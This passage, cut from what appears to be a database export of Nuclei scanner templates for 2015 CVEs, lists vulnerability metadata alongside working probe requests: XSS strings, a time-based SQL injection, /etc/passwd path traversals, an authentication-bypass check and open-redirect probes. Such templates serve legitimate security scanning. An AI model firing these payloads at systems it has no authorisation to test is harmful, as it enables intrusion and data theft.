'{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201d5b527a7afaf9cd2298eecea9050abd7eb528161ddd9c8f6b3bb07fd1b3d401022100bc96b4607561b72a7ff1ebefd67594db87f556150aef7cee914c442f33c921bd:922c64590222798bb761d5b6d8e72950", "hash": "869c908582cf7845849f15460f77f985", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f45" }, "name": "CVE-2015-2080.yaml", "content": "id: CVE-2015-2080\n\ninfo:\n name: Eclipse Jetty <9.2.9.v20150224 - Sensitive 
Information Leakage\n author: pikpikcu\n severity: high\n description: Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header.\n remediation: |\n Upgrade to a version of Eclipse Jetty that is higher than 9.2.9.v20150224 to mitigate this vulnerability.\n reference:\n - https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md\n - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html\n - http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html\n - https://nvd.nist.gov/vuln/detail/CVE-2015-2080\n - http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00074.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2015-2080\n cwe-id: CWE-200\n epss-score: 0.95465\n epss-percentile: 0.99329\n cpe: cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: fedoraproject\n product: fedora\n tags: cve2015,cve,jetty,packetstorm,fedoraproject\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}\"\n\n headers:\n Referer: \\x00\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Illegal character 0x0 in state\"\n\n - type: status\n status:\n - 400\n# digest: 490a0046304402205c8d0476a6f051a3ec41adbc3bbb3c3df32392a0a2d380ba4f7a3c845cca139702206f3666b9266c8b39bb342ff44104fe3ccc5b32839313e08d76981ce2ebdc12e6:922c64590222798bb761d5b6d8e72950", "hash": "683db05a351cbb93e255c35614671d15", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f46" }, "name": "CVE-2015-2166.yaml", "content": "id: CVE-2015-2166\n\ninfo:\n name: Ericsson Drutt MSDP - Local File Inclusion\n author: daffainfo\n severity: medium\n description: Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote 
attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the Ericsson Drutt MSDP application.\n reference:\n - https://www.exploit-db.com/exploits/36619\n - https://nvd.nist.gov/vuln/detail/CVE-2015-2166\n - http://packetstormsecurity.com/files/131233/Ericsson-Drutt-MSDP-Instance-Monitor-Directory-Traversal-File-Access.html\n - https://www.exploit-db.com/exploits/36619/\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2015-2166\n cwe-id: CWE-22\n epss-score: 0.23272\n epss-percentile: 0.96445\n cpe: cpe:2.3:a:ericsson:drutt_mobile_service_delivery_platform:4.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ericsson\n product: drutt_mobile_service_delivery_platform\n tags: cve2015,cve,lfi,ericsson,edb,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022005ae10e49409ebd18ff174804d7b53c1ab9d1306850dfaff9163b785375be21c022100a6d97e3ba5c48553ae5e792432ca523f33cda27717ef085f3013c21e3dce7465:922c64590222798bb761d5b6d8e72950", "hash": "8e50538b3547af9f3e299a6b531bbdee", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f47" }, "name": "CVE-2015-2196.yaml", "content": "id: CVE-2015-2196\n\ninfo:\n name: WordPress Spider Calendar <=1.4.9 - SQL Injection\n author: theamanrawat\n severity: high\n description: |\n WordPress Spider Calendar 
plugin through 1.4.9 is susceptible to SQL injection. An attacker can execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or complete compromise of the WordPress site.\n remediation: Fixed in version 1.4.14.\n reference:\n - https://wpscan.com/vulnerability/8d436356-37f8-455e-99b3-effe8d0e3cad\n - https://wordpress.org/plugins/spider-event-calendar/\n - http://www.exploit-db.com/exploits/36061\n - https://nvd.nist.gov/vuln/detail/CVE-2015-2196\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2015-2196\n cwe-id: CWE-89\n epss-score: 0.0025\n epss-percentile: 0.6433\n cpe: cpe:2.3:a:web-dorado:spider_calendar:1.4.9:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: web-dorado\n product: spider_calendar\n framework: wordpress\n tags: cve2015,cve,wordpress,wp,sqli,wpscan,wp-plugin,spider-event-calendar,unauth,edb,web-dorado\n\nhttp:\n - raw:\n - |\n @timeout 10s\n GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration_1>=6'\n - 'status_code == 200'\n - 'contains(body, \"{\\\"status\\\":true,\\\"data\\\"\")'\n condition: and\n# digest: 4b0a00483046022100bd7e63311d4cf6f8337571a1a59b5d7011819ff9c6b2ff98931e30318db0adf3022100ffe10684ebe0641b20298ef67f1e62873e23b9e6fc44edd1b0cbc5127ab7103b:922c64590222798bb761d5b6d8e72950", "hash": "ba9196b0ca368db2e164870f2497c33f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f48" }, 
"name": "CVE-2015-2755.yaml", "content": "id: CVE-2015-2755\n\ninfo:\n name: WordPress AB Google Map Travel <=3.4 - Stored Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress AB Google Map Travel plugin through 3.4 contains multiple stored cross-site scripting vulnerabilities. The plugin allows an attacker to hijack the administrator authentication for requests via the (1) lat (Latitude), (2) long (Longitude), (3) map_width, (4) map_height, or (5) zoom (Map Zoom) parameters in the ab_map_options page to wp-admin/admin.php.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement.\n remediation: |\n Update to the latest version of the AB Google Map Travel plugin (>=3.5) or apply the vendor-supplied patch to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/131155/\n - http://packetstormsecurity.com/files/131155/WordPress-Google-Map-Travel-3.4-XSS-CSRF.html\n - http://packetstormsecurity.com/files/130960/WordPress-AB-Google-Map-Travel-CSRF-XSS.html\n - https://nvd.nist.gov/vuln/detail/https://nvd.nist.gov/vuln/detail/CVE-2015-2755\n - https://wordpress.org/plugins/ab-google-map-travel/changelog/\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P\n cvss-score: 6.8\n cve-id: CVE-2015-2755\n cwe-id: CWE-352\n epss-score: 0.01828\n epss-percentile: 0.87952\n cpe: cpe:2.3:a:ab_google_map_travel_project:ab_google_map_travel:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: ab_google_map_travel_project\n product: ab_google_map_travel\n framework: wordpress\n tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,authenticated,ab_google_map_travel_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 
log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n @timeout: 10s\n POST /wp-admin/admin.php?page=ab_map_options HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n lat=%22%3E+%3Cscript%3E%2B-%2B-1-%2B-%2Balert%28document.domain%29%3C%2Fscript%3E&long=76.26730&lang=en&map_width=500&map_height=300&zoom=7&day_less_five_fare=2&day_more_five_fare=1.5&less_five_fare=3&more_five_fare=2.5&curr_format=%24&submit=Update+Settings\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"\")'\n - 'contains(body_2, \"ab-google-map-travel\")'\n condition: and\n# digest: 4b0a00483046022100a8cc9f76a8f68db2a3748140015caa53d81843095f1e655982d65ba4131f12a30221008e49c9ca4169a002b1dbb5d8bc1e327243553007a41e8adfc1e6222a47cab0e2:922c64590222798bb761d5b6d8e72950", "hash": "6ac832954a1272afb75a235be91efb97", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f49" }, "name": "CVE-2015-2794.yaml", "content": "id: CVE-2015-2794\n\ninfo:\n name: DotNetNuke 07.04.00 - Administration Authentication Bypass\n author: 0xr2r\n severity: critical\n description: |\n The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2015-2794\n - https://www.exploit-db.com/exploits/39777\n - http://www.dnnsoftware.com/community-blog/cid/155198/workaround-for-potential-security-issue\n - http://www.dnnsoftware.com/community/security/security-center\n - https://dotnetnuke.codeplex.com/releases/view/615317\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2015-2794\n cwe-id: CWE-264\n epss-score: 0.97458\n epss-percentile: 0.99953\n cpe: cpe:2.3:a:dotnetnuke:dotnetnuke:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 
1\n vendor: dotnetnuke\n product: dotnetnuke\n fofa-query: app=\"DotNetNuke\"\n tags: cve2015,cve,dotnetnuke,auth-bypass,install\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Install/InstallWizard.aspx?__VIEWSTATE\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Administrative Information\"\n - \"Database Information\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100963e0da7dc7d871a054737b37e18f3cf4a88a499d60ab976e55a64b8b71b8f4802210098e0935f4fae3fb4f2771f8a890b65875b19cb5f1008ca03c9ac6ee6deebce71:922c64590222798bb761d5b6d8e72950", "hash": "7ff68d3643dd60815863f523f27569a1", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f4a" }, "name": "CVE-2015-2807.yaml", "content": "id: CVE-2015-2807\n\ninfo:\n name: Navis DocumentCloud <0.1.1 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to a version higher than 0.1.1 that includes proper input sanitization to mitigate the XSS vulnerability.\n reference:\n - https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/\n - https://security.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/\n - https://wordpress.org/plugins/navis-documentcloud/changelog/\n - https://nvd.nist.gov/vuln/detail/CVE-2015-2807\n - https://wpvulndb.com/vulnerabilities/8164\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n 
cvss-score: 4.3\n cve-id: CVE-2015-2807\n cwe-id: CWE-79\n epss-score: 0.00294\n epss-percentile: 0.68624\n cpe: cpe:2.3:a:documentcloud:navis_documentcloud:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: documentcloud\n product: navis_documentcloud\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/navis-documentcloud\"\n tags: cve2015,cve,wordpress,wp-plugin,xss,documentcloud\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/navis-documentcloud/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Navis'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210088a6906ad39a7b6d77f1bf0198de8fc5e3e1f59c7606690649f554952b8e71d5022100b42919235cda07c096a34dce69f2d8ff8b3e19d5f309acbac8bbea3e9140e5fc:922c64590222798bb761d5b6d8e72950", "hash": "ce3a5908f0cf623904e12ecfeb48c043", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f4b" }, "name": "CVE-2015-2863.yaml", "content": "id: CVE-2015-2863\n\ninfo:\n name: Kaseya Virtual System Administrator - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: |\n Kaseya Virtual System Administrator 7.x before 7.0.0.29, 8.x before 8.0.0.18, 9.0 before 9.0.0.14, and 9.1 before 9.1.0.4 are susceptible to an open redirect vulnerability. 
An attacker can redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.\n remediation: |\n Apply the latest security patches and updates provided by Kaseya to fix the open redirect vulnerability in the Kaseya Virtual System Administrator (VSA).\n reference:\n - https://github.com/pedrib/PoC/blob/3f927b957b86a91ce65b017c4b9c93d05e241592/advisories/Kaseya/kaseya-vsa-vuln.txt\n - http://www.kb.cert.org/vuls/id/919604\n - https://nvd.nist.gov/vuln/detail/CVE-2015-2863\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2015-2863\n cwe-id: CWE-601\n epss-score: 0.00626\n epss-percentile: 0.76747\n cpe: cpe:2.3:a:kaseya:virtual_system_administrator:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: kaseya\n product: virtual_system_administrator\n tags: cve2015,cve,redirect,kaseya\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/inc/supportLoad.asp?urlToLoad=http://oast.me'\n - '{{BaseURL}}/vsaPres/Web20/core/LocalProxy.ashx?url=http://oast.me'\n\n stop-at-first-match: true\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1\n# digest: 4a0a00473045022033fc40b6ad2baca8ef5a0faf48a297f8e14cac8e720047cf1fe5e96fcc10f293022100cf0c442e4cdd4914c177d6a54eb4d2115d579e4fe66231ee6dab3b91118d424a:922c64590222798bb761d5b6d8e72950", "hash": "1c3f3106b0390e6318cd31dc783c817c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f4c" }, "name": "CVE-2015-2996.yaml", "content": "id: CVE-2015-2996\n\ninfo:\n name: SysAid Help Desk <15.2 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: |\n SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow 
remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server.\n remediation: |\n Upgrade SysAid Help Desk to version 15.2 or later to mitigate the vulnerability.\n reference:\n - https://seclists.org/fulldisclosure/2015/Jun/8\n - https://www.sysaid.com/blog/entry/sysaid-15-2-your-voice-your-service-desk\n - http://seclists.org/fulldisclosure/2015/Jun/8\n - https://nvd.nist.gov/vuln/detail/CVE-2015-2996\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:C\n cvss-score: 8.5\n cve-id: CVE-2015-2996\n cwe-id: CWE-22\n epss-score: 0.77754\n epss-percentile: 0.98153\n cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: sysaid\n product: sysaid\n shodan-query: http.favicon.hash:1540720428\n tags: cve2015,cve,sysaid,lfi,seclists\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd\"\n - \"{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220312369a2b289aed97447a2b6f30dc5d2b433cdaaadac8006d3c5cdac9eac8bcb022100c6c5b7d290b6e9c305b740862e6371ed4874567dc834c7705e73d0655613aa73:922c64590222798bb761d5b6d8e72950", "hash": "6b1f2aa1635a51953aa5d1605b940880", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f4d" }, "name": "CVE-2015-3035.yaml", "content": "id: CVE-2015-3035\n\ninfo:\n name: TP-LINK - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: |\n TP-LINK is 
susceptible to local file inclusion in these products: Archer C5 (1.2) with firmware before 150317, Archer C7 (2.0) with firmware before 150304, and C8 (1.0) with firmware before 150316, Archer C9 (1.0), TL-WDR3500 (1.0), TL-WDR3600 (1.0), and TL-WDR4300 (1.0) with firmware before 150302, TL-WR740N (5.0) and TL-WR741ND (5.0) with firmware before 150312, and TL-WR841N (9.0), TL-WR841N (10.0), TL-WR841ND (9.0), and TL-WR841ND (10.0) with firmware before 150310. Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed.\n impact: |\n An attacker can read sensitive files on the TP-LINK router, potentially leading to unauthorized access or disclosure of sensitive information.\n remediation: |\n Apply the latest firmware update provided by TP-LINK to fix the local file inclusion vulnerability.\n reference:\n - https://seclists.org/fulldisclosure/2015/Apr/26\n - https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150410-0_TP-Link_Unauthenticated_local_file_disclosure_vulnerability_v10.txt\n - http://www.tp-link.com/en/download/TL-WDR3600_V1.html#Firmware\n - https://nvd.nist.gov/vuln/detail/CVE-2015-3035\n - http://www.tp-link.com/en/download/Archer-C5_V1.20.html#Firmware\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N\n cvss-score: 7.8\n cve-id: CVE-2015-3035\n cwe-id: CWE-22\n epss-score: 0.58993\n epss-percentile: 0.97444\n cpe: cpe:2.3:o:tp-link:tl-wr841n_\\(9.0\\)_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: tp-link\n product: tl-wr841n_\\(9.0\\)_firmware\n shodan-query: http.title:\"TP-LINK\"\n tags: cve2015,cve,router,lfi,seclists,tplink,kev,tp-link\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login/../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 
4a0a0047304502204768364244d39e7174ab745661a9b31b5c4a63196ef946111d7805224675b70b022100ffd194906b2d3558567d2e6ac11fa657016da8d600e7908912b66ece312d2f2f:922c64590222798bb761d5b6d8e72950", "hash": "1bfcf282606ae7f8711963f1ab9b38fa", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f4e" }, "name": "CVE-2015-3224.yaml", "content": "id: CVE-2015-3224\n\ninfo:\n name: Ruby on Rails Web Console - Remote Code Execution\n author: pdteam\n severity: medium\n description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb.\n impact: |\n Remote code execution can lead to unauthorized access, data breaches, and complete compromise of the affected system.\n remediation: |\n Upgrade to a patched version of Ruby on Rails or disable the Web Console feature.\n reference:\n - https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/\n - https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/\n - https://hackerone.com/reports/44513\n - https://nvd.nist.gov/vuln/detail/CVE-2015-3224\n - http://lists.fedoraproject.org/pipermail/package-announce/2015-June/160881.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2015-3224\n cwe-id: CWE-284\n epss-score: 0.92904\n epss-percentile: 0.98975\n cpe: cpe:2.3:a:rubyonrails:web_console:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: rubyonrails\n product: web_console\n tags: cve2015,cve,ruby,hackerone,rce,rails,intrusive,rubyonrails\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/{{randstr}}\"\n\n headers:\n X-Forwarded-For: ::1\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Rails.root:\"\n - \"Action Controller: Exception caught\"\n condition: 
and\n\n - type: word\n part: response\n words:\n - X-Web-Console-Session-Id\n - data-remote-path=\n - data-session-id=\n case-insensitive: true\n condition: or\n# digest: 4a0a00473045022100c4b2125a78ee523a116fd826ab60375b59dd4e7783faf87bb57fdb018ec7183702203cd169073ca993580b1ad5b798b29f12ea43ea85d77a1f8eb1fce8095e0a0b34:922c64590222798bb761d5b6d8e72950", "hash": "af4faab39db80a9342d0a2331bf69b26", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f4f" }, "name": "CVE-2015-3337.yaml", "content": "id: CVE-2015-3337\n\ninfo:\n name: Elasticsearch - Local File Inclusion\n author: pdteam\n severity: medium\n description: Elasticsearch before 1.4.5 and 1.5.x before 1.5.2 allows remote attackers to read arbitrary files via unspecified vectors when a site plugin is enabled.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server.\n remediation: |\n Upgrade to a patched version of Elasticsearch or apply the necessary security patches.\n reference:\n - https://www.exploit-db.com/exploits/37054/\n - https://www.elastic.co/community/security\n - http://www.debian.org/security/2015/dsa-3241\n - https://nvd.nist.gov/vuln/detail/CVE-2015-3337\n - http://packetstormsecurity.com/files/131646/Elasticsearch-Directory-Traversal.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N\n cvss-score: 4.3\n cve-id: CVE-2015-3337\n cwe-id: CWE-22\n epss-score: 0.96447\n epss-percentile: 0.9948\n cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: elasticsearch\n product: elasticsearch\n tags: cve2015,cve,packetstorm,edb,elastic,lfi,elasticsearch,plugin\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 
4a0a0047304502206b4169ea4037924ebdc00d3cc7130c430dcd5ec43759ee09a9f082345b65f7dd022100c41635084e4f84a3e64265efc16c730e5b4725552238f864784bae130304e1f8:922c64590222798bb761d5b6d8e72950", "hash": "ec672aaf99ddf62cbd881b23a7159fc2", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f50" }, "name": "CVE-2015-3648.yaml", "content": "id: CVE-2015-3648\n\ninfo:\n name: ResourceSpace - Local File inclusion\n author: pikpikcu\n severity: high\n description: ResourceSpace is prone to a local file-inclusion vulnerability because it fails to sufficiently sanitize user-supplied input.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks.\n remediation: |\n Upgrade to the latest version of ResourceSpace to fix the local file inclusion vulnerability.\n reference:\n - https://vulners.com/cve/CVE-2015-3648/\n - http://svn.montala.com/websvn/revision.php?repname=ResourceSpace&path=%2F&rev=6640&peg=6738\n - http://packetstormsecurity.com/files/132142/ResourceSpace-7.1.6513-Local-File-Inclusion.html\n - https://nvd.nist.gov/vuln/detail/CVE-2015-3648\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2015-3648\n cwe-id: CWE-22\n epss-score: 0.02644\n epss-percentile: 0.90124\n cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: montala\n product: resourcespace\n tags: cve2015,cve,lfi,resourcespace,packetstorm,montala\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 
490a004630440220648060aa6f48efed100d6c3af1a59ebd765dd1e5e395decdf098e3b2e8748309022065fdb6859c50c278bb5ead61bdc761c9fe3d5c922cdf04874d98784fe719eeb9:922c64590222798bb761d5b6d8e72950", "hash": "bdd5c1464b350334ef2c467d80b3dc6d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f51" }, "name": "CVE-2015-3897.yaml", "content": "id: CVE-2015-3897\n\ninfo:\n name: Bonita BPM Portal <6.5.3 - Local File Inclusion\n author: 0x_Akoko\n severity: medium\n description: Bonita BPM Portal before 6.5.3 allows remote attackers to read arbitrary files via a .. (dot dot) in the theme parameter and a file path in the location parameter to bonita/portal/themeResource.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Upgrade Bonita BPM Portal to version 6.5.3 or later to mitigate the vulnerability.\n reference:\n - https://packetstormsecurity.com/files/132237/Bonita-BPM-6.5.1-Directory-Traversal-Open-Redirect.html\n - https://www.bonitasoft.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2015-3897\n - https://www.htbridge.com/advisory/HTB23259\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2015-3897\n cwe-id: CWE-22\n epss-score: 0.83225\n epss-percentile: 0.98353\n cpe: cpe:2.3:a:bonitasoft:bonita_bpm_portal:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: bonitasoft\n product: bonita_bpm_portal\n tags: cve2015,cve,unauth,packetstorm,bonita,lfi,bonitasoft\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd\"\n - \"{{BaseURL}}/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini\"\n\n stop-at-first-match: true\n\n matchers-condition: or\n 
